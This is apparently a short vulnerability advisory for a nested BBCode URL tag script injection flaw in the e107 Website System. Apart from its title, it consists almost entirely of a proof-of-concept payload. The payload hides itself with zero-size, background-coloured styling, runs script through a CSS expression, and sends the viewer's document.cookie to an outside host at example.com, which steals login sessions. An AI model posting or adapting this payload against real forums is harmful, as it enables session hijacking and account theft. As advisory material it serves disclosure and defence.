e107 Website System Nested BBCode URL Tag Script Injection Vulnerability

e107 Website System Nested BBCode URL Tag Script Injection Vulnerability

No exploit is required.

The following proof of concept is available:
[color=#EFEFEF][url]www.ut[url=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.example.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]